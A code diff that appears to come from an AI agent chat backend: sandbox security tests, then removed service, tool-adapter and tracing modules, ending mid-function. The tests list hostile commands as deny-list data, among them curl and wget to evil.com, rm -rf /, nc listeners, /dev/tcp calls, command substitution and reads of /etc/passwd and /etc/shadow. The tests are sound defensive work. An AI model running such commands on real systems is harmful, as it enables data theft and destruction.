def test_read_outside_workspace_denied():
result = _validate_tool_access(
"Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_write_outside_workspace_denied():
result = _validate_tool_access(
"Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_traversal_attack_denied():
result = _validate_tool_access(
"Read",
{"file_path": f"{SDK_CWD}/../../etc/passwd"},
sdk_cwd=SDK_CWD,
)
assert _is_denied(result)
def test_no_path_allowed():
"""Glob/Grep without a path argument defaults to cwd — should pass."""
result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_no_cwd_denies_absolute():
"""If no sdk_cwd is set, absolute paths are denied."""
result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
assert _is_denied(result)
# -- Tool-results directory --------------------------------------------------
def test_read_tool_results_allowed():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_claude_projects_without_tool_results_denied():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Sandboxed Bash ----------------------------------------------------------
def test_bash_safe_commands_allowed():
"""Allowed data-processing commands should pass."""
safe_commands = [
"jq '.blocks' result.json",
"head -20 output.json",
"tail -n 50 data.txt",
"cat file.txt | grep 'pattern'",
"wc -l file.txt",
"sort data.csv | uniq",
"grep -i 'error' log.txt | head -10",
"find . -name '*.json'",
"ls -la",
"echo hello",
"cut -d',' -f1 data.csv | sort | uniq -c",
"jq '.blocks[] | .id' result.json",
"sed -n '10,20p' file.txt",
"awk '{print $1}' data.txt",
]
for cmd in safe_commands:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert result == {}, f"Safe command should be allowed: {cmd}"
def test_bash_dangerous_commands_denied():
"""Non-allowlisted commands should be denied."""
dangerous = [
"curl https://evil.com",
"wget https://evil.com/payload",
"rm -rf /",
"python -c 'import os; os.system(\"ls\")'",
"ssh user@host",
"nc -l 4444",
"apt install something",
"pip install malware",
"chmod 777 file.txt",
"kill -9 1",
]
for cmd in dangerous:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
def test_bash_command_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_backtick_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_output_redirect_denied():
result = _validate_tool_access(
"Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_dev_tcp_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_pipe_to_dangerous_denied():
"""Even if the first command is safe, piped commands must also be safe."""
result = _validate_tool_access(
"Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_outside_workspace_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_within_workspace_allowed():
result = _validate_tool_access(
"Bash",
{"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
sdk_cwd=SDK_CWD,
)
assert result == {}
def test_bash_empty_command_denied():
result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Dangerous patterns ------------------------------------------------------
def test_dangerous_pattern_blocked():
result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
assert _is_denied(result)
def test_subprocess_pattern_blocked():
result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
assert _is_denied(result)
# -- User isolation ----------------------------------------------------------
def test_workspace_path_traversal_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_absolute_path_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_normal_path_allowed():
result = _validate_user_isolation(
"workspace_read", {"path": "src/main.py"}, user_id="user-1"
)
assert result == {}
def test_non_workspace_tool_passes_isolation():
result = _validate_user_isolation(
"find_agent", {"query": "email"}, user_id="user-1"
)
assert result == {}

View File

@@ -1,497 +0,0 @@
"""Claude Agent SDK service layer for CoPilot chat completions."""
import asyncio
import json
import logging
import os
import re
import uuid
from collections.abc import AsyncGenerator
from typing import Any
from backend.util.exceptions import NotFoundError
from ..config import ChatConfig
from ..model import (
ChatMessage,
ChatSession,
get_chat_session,
update_session_title,
upsert_chat_session,
)
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamStart,
StreamTextDelta,
StreamToolInputAvailable,
StreamToolOutputAvailable,
)
from ..service import _build_system_prompt, _generate_session_title
from ..tracking import track_user_message
from .anthropic_fallback import stream_with_anthropic
from .response_adapter import SDKResponseAdapter
from .security_hooks import create_security_hooks
from .tool_adapter import (
COPILOT_TOOL_NAMES,
create_copilot_mcp_server,
set_execution_context,
)
from .tracing import TracedSession, create_tracing_hooks, merge_hooks
logger = logging.getLogger(__name__)
config = ChatConfig()
# Set to hold background tasks to prevent garbage collection
_background_tasks: set[asyncio.Task[Any]] = set()
_SDK_CWD_PREFIX = "/tmp/copilot-"
# Appended to the system prompt to inform the agent about Bash restrictions.
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
# but it doesn't know about our security hooks' command allowlist for Bash.
_SDK_TOOL_SUPPLEMENT = """
## Bash restrictions
The Bash tool is restricted to safe, read-only data-processing commands:
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
echo, diff, base64, and similar utilities.
Network commands (curl, wget), destructive commands (rm, chmod), and
interpreters (python, node) are NOT available.
"""
def _make_sdk_cwd(session_id: str) -> str:
"""Create a safe, session-specific working directory path.
Sanitizes session_id, then validates the resulting path stays under /tmp/
using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
"""
# Step 1: Sanitize - only allow alphanumeric and hyphens
safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
if not safe_id:
raise ValueError("Session ID is empty after sanitization")
# Step 2: Construct path with known-safe prefix
cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
# Step 3: Validate the path is still under our prefix (prevent traversal)
if not cwd.startswith(_SDK_CWD_PREFIX):
raise ValueError(f"Session path escaped prefix: {cwd}")
# Step 4: Additional assertion for defense-in-depth
assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"
return cwd
def _cleanup_sdk_tool_results(cwd: str) -> None:
"""Remove SDK tool-result files for a specific session working directory.
The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
We clean only the specific cwd's results to avoid race conditions between
concurrent sessions.
Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
"""
import shutil
# Security check 1: Validate cwd is under the expected prefix
normalized = os.path.normpath(cwd)
if not normalized.startswith(_SDK_CWD_PREFIX):
logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
return
# Security check 2: Ensure no path traversal in the normalized path
if ".." in normalized:
logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
return
# SDK encodes the cwd path by replacing '/' with '-'
encoded_cwd = normalized.replace("/", "-")
# Construct the project directory path (known-safe home expansion)
claude_projects = os.path.expanduser("~/.claude/projects")
project_dir = os.path.join(claude_projects, encoded_cwd)
# Security check 3: Validate project_dir is under ~/.claude/projects
project_dir = os.path.normpath(project_dir)
if not project_dir.startswith(claude_projects):
logger.warning(
f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
)
return
results_dir = os.path.join(project_dir, "tool-results")
if os.path.isdir(results_dir):
for filename in os.listdir(results_dir):
file_path = os.path.join(results_dir, filename)
try:
if os.path.isfile(file_path):
os.remove(file_path)
except OSError:
pass
# Also clean up the temp cwd directory itself
try:
shutil.rmtree(normalized, ignore_errors=True)
except OSError:
pass
async def _compress_conversation_history(
session: ChatSession,
) -> list[ChatMessage]:
"""Compress prior conversation messages if they exceed the token threshold.
Uses the shared compress_context() from prompt.py which supports:
- LLM summarization of old messages (keeps recent ones intact)
- Progressive content truncation as fallback
- Middle-out deletion as last resort
Returns the compressed prior messages (everything except the current message).
"""
prior = session.messages[:-1]
if len(prior) < 2:
return prior
from backend.util.prompt import compress_context
# Convert ChatMessages to dicts for compress_context
messages_dict = []
for msg in prior:
msg_dict: dict[str, Any] = {"role": msg.role}
if msg.content:
msg_dict["content"] = msg.content
if msg.tool_calls:
msg_dict["tool_calls"] = msg.tool_calls
if msg.tool_call_id:
msg_dict["tool_call_id"] = msg.tool_call_id
messages_dict.append(msg_dict)
try:
import openai
async with openai.AsyncOpenAI(
api_key=config.api_key, base_url=config.base_url, timeout=30.0
) as client:
result = await compress_context(
messages=messages_dict,
model=config.model,
client=client,
)
except Exception as e:
logger.warning(f"[SDK] Context compression with LLM failed: {e}")
# Fall back to truncation-only (no LLM summarization)
result = await compress_context(
messages=messages_dict,
model=config.model,
client=None,
)
if result.was_compacted:
logger.info(
f"[SDK] Context compacted: {result.original_token_count} -> "
f"{result.token_count} tokens "
f"({result.messages_summarized} summarized, "
f"{result.messages_dropped} dropped)"
)
# Convert compressed dicts back to ChatMessages
return [
ChatMessage(
role=m["role"],
content=m.get("content"),
tool_calls=m.get("tool_calls"),
tool_call_id=m.get("tool_call_id"),
)
for m in result.messages
]
return prior
def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
"""Format conversation messages into a context prefix for the user message.
Returns a string like:
<conversation_history>
User: hello
You responded: Hi! How can I help?
</conversation_history>
Returns None if there are no messages to format.
"""
if not messages:
return None
lines: list[str] = []
for msg in messages:
if not msg.content:
continue
if msg.role == "user":
lines.append(f"User: {msg.content}")
elif msg.role == "assistant":
lines.append(f"You responded: {msg.content}")
# Skip tool messages — they're internal details
if not lines:
return None
return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
async def stream_chat_completion_sdk(
session_id: str,
message: str | None = None,
tool_call_response: str | None = None, # noqa: ARG001
is_user_message: bool = True,
user_id: str | None = None,
retry_count: int = 0, # noqa: ARG001
session: ChatSession | None = None,
context: dict[str, str] | None = None, # noqa: ARG001
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream chat completion using Claude Agent SDK.
Drop-in replacement for stream_chat_completion with improved reliability.
"""
if session is None:
session = await get_chat_session(session_id, user_id)
if not session:
raise NotFoundError(
f"Session {session_id} not found. Please create a new session first."
)
if message:
session.messages.append(
ChatMessage(
role="user" if is_user_message else "assistant", content=message
)
)
if is_user_message:
track_user_message(
user_id=user_id, session_id=session_id, message_length=len(message)
)
session = await upsert_chat_session(session)
# Generate title for new sessions (first user message)
if is_user_message and not session.title:
user_messages = [m for m in session.messages if m.role == "user"]
if len(user_messages) == 1:
first_message = user_messages[0].content or message or ""
if first_message:
task = asyncio.create_task(
_update_title_async(session_id, first_message, user_id)
)
_background_tasks.add(task)
task.add_done_callback(_background_tasks.discard)
# Build system prompt (reuses non-SDK path with Langfuse support)
has_history = len(session.messages) > 1
system_prompt, _ = await _build_system_prompt(
user_id, has_conversation_history=has_history
)
system_prompt += _SDK_TOOL_SUPPLEMENT
message_id = str(uuid.uuid4())
text_block_id = str(uuid.uuid4())
task_id = str(uuid.uuid4())
yield StreamStart(messageId=message_id, taskId=task_id)
stream_completed = False
# Use a session-specific temp dir to avoid cleanup race conditions
# between concurrent sessions.
sdk_cwd = _make_sdk_cwd(session_id)
os.makedirs(sdk_cwd, exist_ok=True)
set_execution_context(user_id, session, None)
try:
try:
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
mcp_server = create_copilot_mcp_server()
# Initialize Langfuse tracing (no-op if not configured)
tracer = TracedSession(session_id, user_id, system_prompt)
# Merge security hooks with optional tracing hooks
security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
tracing_hooks = create_tracing_hooks(tracer)
combined_hooks = merge_hooks(security_hooks, tracing_hooks)
options = ClaudeAgentOptions(
system_prompt=system_prompt,
mcp_servers={"copilot": mcp_server}, # type: ignore[arg-type]
allowed_tools=COPILOT_TOOL_NAMES,
hooks=combined_hooks, # type: ignore[arg-type]
cwd=sdk_cwd,
max_buffer_size=config.sdk_max_buffer_size,
)
adapter = SDKResponseAdapter(message_id=message_id)
adapter.set_task_id(task_id)
async with tracer, ClaudeSDKClient(options=options) as client:
current_message = message or ""
if not current_message and session.messages:
last_user = [m for m in session.messages if m.role == "user"]
if last_user:
current_message = last_user[-1].content or ""
if not current_message.strip():
yield StreamError(
errorText="Message cannot be empty.",
code="empty_prompt",
)
yield StreamFinish()
return
# Build query with conversation history context.
# Compress history first to handle long conversations.
query_message = current_message
if len(session.messages) > 1:
compressed = await _compress_conversation_history(session)
history_context = _format_conversation_context(compressed)
if history_context:
query_message = (
f"{history_context}\n\n"
f"Now, the user says:\n{current_message}"
)
logger.info(
f"[SDK] Sending query: {current_message[:80]!r}"
f" ({len(session.messages)} msgs in session)"
)
tracer.log_user_message(current_message)
await client.query(query_message, session_id=session_id)
assistant_response = ChatMessage(role="assistant", content="")
accumulated_tool_calls: list[dict[str, Any]] = []
has_appended_assistant = False
has_tool_results = False
async for sdk_msg in client.receive_messages():
logger.debug(
f"[SDK] Received: {type(sdk_msg).__name__} "
f"{getattr(sdk_msg, 'subtype', '')}"
)
tracer.log_sdk_message(sdk_msg)
for response in adapter.convert_message(sdk_msg):
if isinstance(response, StreamStart):
continue
yield response
if isinstance(response, StreamTextDelta):
delta = response.delta or ""
# After tool results, start a new assistant
# message for the post-tool text.
if has_tool_results and has_appended_assistant:
assistant_response = ChatMessage(
role="assistant", content=delta
)
accumulated_tool_calls = []
has_appended_assistant = False
has_tool_results = False
session.messages.append(assistant_response)
has_appended_assistant = True
else:
assistant_response.content = (
assistant_response.content or ""
) + delta
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolInputAvailable):
accumulated_tool_calls.append(
{
"id": response.toolCallId,
"type": "function",
"function": {
"name": response.toolName,
"arguments": json.dumps(response.input or {}),
},
}
)
assistant_response.tool_calls = accumulated_tool_calls
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolOutputAvailable):
session.messages.append(
ChatMessage(
role="tool",
content=(
response.output
if isinstance(response.output, str)
else str(response.output)
),
tool_call_id=response.toolCallId,
)
)
has_tool_results = True
elif isinstance(response, StreamFinish):
stream_completed = True
if stream_completed:
break
if (
assistant_response.content or assistant_response.tool_calls
) and not has_appended_assistant:
session.messages.append(assistant_response)
except ImportError:
logger.warning(
"[SDK] claude-agent-sdk not available, using Anthropic fallback"
)
async for response in stream_with_anthropic(
session, system_prompt, text_block_id
):
if isinstance(response, StreamFinish):
stream_completed = True
yield response
await upsert_chat_session(session)
logger.debug(
f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
)
if not stream_completed:
yield StreamFinish()
except Exception as e:
logger.error(f"[SDK] Error: {e}", exc_info=True)
try:
await upsert_chat_session(session)
except Exception as save_err:
logger.error(f"[SDK] Failed to save session on error: {save_err}")
yield StreamError(
errorText="An error occurred. Please try again.",
code="sdk_error",
)
yield StreamFinish()
finally:
_cleanup_sdk_tool_results(sdk_cwd)
async def _update_title_async(
session_id: str, message: str, user_id: str | None = None
) -> None:
"""Background task to update session title."""
try:
title = await _generate_session_title(
message, user_id=user_id, session_id=session_id
)
if title:
await update_session_title(session_id, title)
logger.debug(f"[SDK] Generated title for {session_id}: {title}")
except Exception as e:
logger.warning(f"[SDK] Failed to update session title: {e}")

View File

@@ -1,321 +0,0 @@
"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
This module provides the adapter layer that converts existing BaseTool implementations
into in-process MCP tools that can be used with the Claude Agent SDK.
"""
import json
import logging
import os
import uuid
from contextvars import ContextVar
from typing import Any
from backend.api.features.chat.model import ChatSession
from backend.api.features.chat.tools import TOOL_REGISTRY
from backend.api.features.chat.tools.base import BaseTool
logger = logging.getLogger(__name__)
# Allowed base directory for the Read tool (SDK saves oversized tool results here)
_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
MCP_SERVER_NAME = "copilot"
MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
# Context variables to pass user/session info to tool execution
_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
_current_session: ContextVar[ChatSession | None] = ContextVar(
"current_session", default=None
)
_current_tool_call_id: ContextVar[str | None] = ContextVar(
"current_tool_call_id", default=None
)
# Stash for MCP tool outputs before the SDK potentially truncates them.
# Keyed by tool_name → full output string. Consumed (popped) by the
# response adapter when it builds StreamToolOutputAvailable.
_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
"pending_tool_outputs", default=None # type: ignore[arg-type]
)
def set_execution_context(
user_id: str | None,
session: ChatSession,
tool_call_id: str | None = None,
) -> None:
"""Set the execution context for tool calls.
This must be called before streaming begins to ensure tools have access
to user_id and session information.
"""
_current_user_id.set(user_id)
_current_session.set(session)
_current_tool_call_id.set(tool_call_id)
_pending_tool_outputs.set({})
def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
"""Get the current execution context."""
return (
_current_user_id.get(),
_current_session.get(),
_current_tool_call_id.get(),
)
def pop_pending_tool_output(tool_name: str) -> str | None:
"""Pop and return the stashed full output for *tool_name*.
The SDK CLI may truncate large tool results (writing them to disk and
replacing the content with a file reference). This stash keeps the
original MCP output so the response adapter can forward it to the
frontend for proper widget rendering.
Returns ``None`` if nothing was stashed for *tool_name*.
"""
pending = _pending_tool_outputs.get(None)
if pending is None:
return None
return pending.pop(tool_name, None)
def create_tool_handler(base_tool: BaseTool):
"""Create an async handler function for a BaseTool.
This wraps the existing BaseTool._execute method to be compatible
with the Claude Agent SDK MCP tool format.
"""
async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Execute the wrapped tool and return MCP-formatted response."""
user_id, session, tool_call_id = get_execution_context()
if session is None:
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": "No session context available",
"type": "error",
}
),
}
],
"isError": True,
}
try:
# Call the existing tool's execute method
# Generate unique tool_call_id per invocation for proper correlation
effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
result = await base_tool.execute(
user_id=user_id,
session=session,
tool_call_id=effective_id,
**args,
)
# The result is a StreamToolOutputAvailable, extract the output
text = (
result.output
if isinstance(result.output, str)
else json.dumps(result.output)
)
# Stash the full output before the SDK potentially truncates it.
# The response adapter will pop this for frontend widget rendering.
pending = _pending_tool_outputs.get(None)
if pending is not None:
pending[base_tool.name] = text
return {
"content": [{"type": "text", "text": text}],
"isError": not result.success,
}
except Exception as e:
logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": str(e),
"type": "error",
"message": f"Failed to execute {base_tool.name}",
}
),
}
],
"isError": True,
}
return tool_handler
def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
"""Build a JSON Schema input schema for a tool."""
return {
"type": "object",
"properties": base_tool.parameters.get("properties", {}),
"required": base_tool.parameters.get("required", []),
}
def get_tool_definitions() -> list[dict[str, Any]]:
"""Get all tool definitions in MCP format.
Returns a list of tool definitions that can be used with
create_sdk_mcp_server or as raw tool definitions.
"""
tool_definitions = []
for tool_name, base_tool in TOOL_REGISTRY.items():
tool_def = {
"name": tool_name,
"description": base_tool.description,
"inputSchema": _build_input_schema(base_tool),
}
tool_definitions.append(tool_def)
return tool_definitions
def get_tool_handlers() -> dict[str, Any]:
"""Get all tool handlers mapped by name.
Returns a dictionary mapping tool names to their handler functions.
"""
handlers = {}
for tool_name, base_tool in TOOL_REGISTRY.items():
handlers[tool_name] = create_tool_handler(base_tool)
return handlers
async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Read a file with optional offset/limit. Restricted to SDK working directory.
After reading, the file is deleted to prevent accumulation in long-running pods.
"""
file_path = args.get("file_path", "")
offset = args.get("offset", 0)
limit = args.get("limit", 2000)
# Security: only allow reads under the SDK's working directory
real_path = os.path.realpath(file_path)
if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
return {
"content": [{"type": "text", "text": f"Access denied: {file_path}"}],
"isError": True,
}
try:
with open(real_path) as f:
lines = f.readlines()
selected = lines[offset : offset + limit]
content = "".join(selected)
return {"content": [{"type": "text", "text": content}], "isError": False}
except FileNotFoundError:
return {
"content": [{"type": "text", "text": f"File not found: {file_path}"}],
"isError": True,
}
except Exception as e:
return {
"content": [{"type": "text", "text": f"Error reading file: {e}"}],
"isError": True,
}
_READ_TOOL_NAME = "Read"
_READ_TOOL_DESCRIPTION = (
"Read a file from the local filesystem. "
"Use offset and limit to read specific line ranges for large files."
)
_READ_TOOL_SCHEMA = {
"type": "object",
"properties": {
"file_path": {
"type": "string",
"description": "The absolute path to the file to read",
},
"offset": {
"type": "integer",
"description": "Line number to start reading from (0-indexed). Default: 0",
},
"limit": {
"type": "integer",
"description": "Number of lines to read. Default: 2000",
},
},
"required": ["file_path"],
}
# Create the MCP server configuration
def create_copilot_mcp_server():
"""Create an in-process MCP server configuration for CoPilot tools.
This can be passed to ClaudeAgentOptions.mcp_servers.
Note: The actual SDK MCP server creation depends on the claude-agent-sdk
package being available. This function returns the configuration that
can be used with the SDK.
"""
try:
from claude_agent_sdk import create_sdk_mcp_server, tool
# Create decorated tool functions
sdk_tools = []
for tool_name, base_tool in TOOL_REGISTRY.items():
handler = create_tool_handler(base_tool)
decorated = tool(
tool_name,
base_tool.description,
_build_input_schema(base_tool),
)(handler)
sdk_tools.append(decorated)
# Add the Read tool so the SDK can read back oversized tool results
read_tool = tool(
_READ_TOOL_NAME,
_READ_TOOL_DESCRIPTION,
_READ_TOOL_SCHEMA,
)(_read_file_handler)
sdk_tools.append(read_tool)
server = create_sdk_mcp_server(
name=MCP_SERVER_NAME,
version="1.0.0",
tools=sdk_tools,
)
return server
except ImportError:
# Let ImportError propagate so service.py handles the fallback
raise
# SDK built-in tools allowed within the workspace directory.
# Security hooks validate that file paths stay within sdk_cwd
# and that Bash commands are restricted to a safe allowlist.
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
# List of tool names for allowed_tools configuration
# Include MCP tools, the MCP Read tool for oversized results,
# and SDK built-in file tools for workspace operations.
COPILOT_TOOL_NAMES = [
*[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
*_SDK_BUILTIN_TOOLS,
]

View File

@@ -1,426 +0,0 @@
"""Langfuse tracing integration for Claude Agent SDK.
This module provides modular, non-invasive observability for SDK sessions.
All tracing is opt-in (only active when Langfuse credentials are configured)
and designed to not affect the core execution flow.
Usage:
async with TracedSession(session_id, user_id) as tracer:
# Your SDK code here
tracer.log_user_message(message)
async for sdk_msg in client.receive_messages():
tracer.log_sdk_message(sdk_msg)
tracer.log_result(result_message)
"""
from __future__ import annotations
import logging
import time
from contextlib import asynccontextmanager
from dataclasses import dataclass, field
from typing import TYPE_CHECKING, Any
from backend.util.settings import Settings
if TYPE_CHECKING:
from claude_agent_sdk import Message, ResultMessage
logger = logging.getLogger(__name__)
settings = Settings()
def _is_langfuse_configured() -> bool:
"""Check if Langfuse credentials are configured."""
return bool(
settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
)
@dataclass
class ToolSpan:
"""Tracks a single tool call for tracing."""
tool_call_id: str
tool_name: str
input: dict[str, Any]
start_time: float = field(default_factory=time.perf_counter)
output: str | None = None
success: bool = True
end_time: float | None = None
@dataclass
class GenerationSpan:
"""Tracks an LLM generation (text output) for tracing."""
text: str = ""
start_time: float = field(default_factory=time.perf_counter)
end_time: float | None = None
tool_calls: list[ToolSpan] = field(default_factory=list)
class TracedSession:
"""Context manager for tracing a Claude Agent SDK session with Langfuse.
Automatically creates a trace with:
- Session-level metadata (user_id, session_id)
- Generation spans for LLM outputs
- Tool call spans with input/output
- Token usage and cost (from ResultMessage)
If Langfuse is not configured, all methods are no-ops.
"""
def __init__(
self,
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
):
self.session_id = session_id
self.user_id = user_id
self.system_prompt = system_prompt
self.enabled = _is_langfuse_configured()
# Internal state
self._trace: Any = None
self._langfuse: Any = None
self._user_message: str | None = None
self._generations: list[GenerationSpan] = []
self._current_generation: GenerationSpan | None = None
self._pending_tools: dict[str, ToolSpan] = {}
self._start_time: float = 0
async def __aenter__(self) -> TracedSession:
"""Start the trace."""
if not self.enabled:
return self
try:
from langfuse import get_client
self._langfuse = get_client()
self._start_time = time.perf_counter()
# Create the root trace
self._trace = self._langfuse.trace(
name="copilot-sdk-session",
session_id=self.session_id,
user_id=self.user_id,
metadata={
"sdk": "claude-agent-sdk",
"has_system_prompt": bool(self.system_prompt),
},
)
logger.debug(f"[Tracing] Started trace for session {self.session_id}")
except Exception as e:
logger.warning(f"[Tracing] Failed to start trace: {e}")
self.enabled = False
return self
async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
"""End the trace and flush to Langfuse."""
if not self.enabled or not self._trace:
return
try:
# Finalize any open generation
self._finalize_current_generation()
# Add generations as spans
for gen in self._generations:
self._trace.span(
name="llm-generation",
start_time=gen.start_time,
end_time=gen.end_time or time.perf_counter(),
output=gen.text[:1000] if gen.text else None, # Truncate
metadata={"tool_calls": len(gen.tool_calls)},
)
# Add tool calls as nested spans
for tool in gen.tool_calls:
self._trace.span(
name=f"tool:{tool.tool_name}",
start_time=tool.start_time,
end_time=tool.end_time or time.perf_counter(),
input=tool.input,
output=tool.output[:500] if tool.output else None,
metadata={
"tool_call_id": tool.tool_call_id,
"success": tool.success,
},
)
# Update trace with final status
status = "error" if exc_type else "success"
self._trace.update(
output=self._generations[-1].text[:500] if self._generations else None,
metadata={"status": status, "num_generations": len(self._generations)},
)
# Flush asynchronously (Langfuse handles this in background)
logger.debug(
f"[Tracing] Completed trace for session {self.session_id}, "
f"{len(self._generations)} generations"
)
except Exception as e:
logger.warning(f"[Tracing] Failed to finalize trace: {e}")
def log_user_message(self, message: str) -> None:
"""Log the user's input message."""
if not self.enabled or not self._trace:
return
self._user_message = message
try:
self._trace.update(input=message[:1000])
except Exception as e:
logger.debug(f"[Tracing] Failed to log user message: {e}")
def log_sdk_message(self, sdk_message: Message) -> None:
"""Log an SDK message (automatically categorizes by type)."""
if not self.enabled:
return
try:
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
if isinstance(sdk_message, AssistantMessage):
# Start a new generation if needed
if self._current_generation is None:
self._current_generation = GenerationSpan()
self._generations.append(self._current_generation)
for block in sdk_message.content:
if isinstance(block, TextBlock) and block.text:
self._current_generation.text += block.text
elif isinstance(block, ToolUseBlock):
tool_span = ToolSpan(
tool_call_id=block.id,
tool_name=block.name,
input=block.input or {},
)
self._pending_tools[block.id] = tool_span
if self._current_generation:
self._current_generation.tool_calls.append(tool_span)
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_span = self._pending_tools.get(block.tool_use_id)
if tool_span:
tool_span.end_time = time.perf_counter()
tool_span.success = not (block.is_error or False)
tool_span.output = self._extract_tool_output(block.content)
# After tool results, finalize current generation
# (SDK will start a new AssistantMessage for continuation)
self._finalize_current_generation()
elif isinstance(sdk_message, ResultMessage):
self._log_result(sdk_message)
except Exception as e:
logger.debug(f"[Tracing] Failed to log SDK message: {e}")
def _log_result(self, result: ResultMessage) -> None:
"""Log the final result with usage and cost."""
if not self.enabled or not self._trace:
return
try:
# Extract usage info
usage = result.usage or {}
metadata: dict[str, Any] = {
"duration_ms": result.duration_ms,
"duration_api_ms": result.duration_api_ms,
"num_turns": result.num_turns,
"is_error": result.is_error,
}
if result.total_cost_usd is not None:
metadata["cost_usd"] = result.total_cost_usd
if usage:
metadata["usage"] = usage
self._trace.update(metadata=metadata)
# Log as a generation for proper Langfuse cost/usage tracking
if usage or result.total_cost_usd:
self._trace.generation(
name="claude-sdk-completion",
model="claude-sonnet-4-20250514", # SDK default model
usage=(
{
"input": usage.get("input_tokens", 0),
"output": usage.get("output_tokens", 0),
"total": usage.get("input_tokens", 0)
+ usage.get("output_tokens", 0),
}
if usage
else None
),
metadata={"cost_usd": result.total_cost_usd},
)
logger.debug(
f"[Tracing] Logged result: {result.num_turns} turns, "
f"${result.total_cost_usd:.4f} cost"
if result.total_cost_usd
else f"[Tracing] Logged result: {result.num_turns} turns"
)
except Exception as e:
logger.debug(f"[Tracing] Failed to log result: {e}")
def _finalize_current_generation(self) -> None:
"""Mark the current generation as complete."""
if self._current_generation:
self._current_generation.end_time = time.perf_counter()
self._current_generation = None
@staticmethod
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract string output from tool result content."""
